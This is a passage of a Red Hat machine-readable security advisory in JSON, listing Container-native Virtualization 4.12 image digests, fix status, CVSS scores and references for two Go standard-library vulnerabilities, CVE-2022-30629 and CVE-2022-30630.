"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2092793"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls golang package. When session tickets are generated by crypto/tls, it is missing the ticket expiration. This issue may allow an attacker to observe the TLS handshakes to correlate successive connections during session resumption.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: crypto/tls: session tickets lack random ticket_age_add",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-30629"
},
{
"category": "external",
"summary": "RHBZ#2092793",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092793"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-30629",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30629"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30629",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30629"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/TzIC9-t8Ytg",
"url": "https://groups.google.com/g/golang-announce/c/TzIC9-t8Ytg"
}
],
"release_date": "2022-06-02T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.1,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "golang: crypto/tls: session tickets lack random ticket_age_add"
},
{
"cve": "CVE-2022-30630",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2022-07-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2107371"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the golang standard library, io/fs. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This could allow an attacker to impact availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: io/fs: stack exhaustion in Glob",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-30630"
},
{
"category": "external",
"summary": "RHBZ#2107371",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-30630",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30630"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30630",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30630"
},
{
"category": "external",
"summary": "https://go.dev/issue/53415",
"url": "https://go.dev/issue/53415"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE",
"url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE"
}
],
"release_date": "2022-07-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"restart_required": {
"category": "none"
},
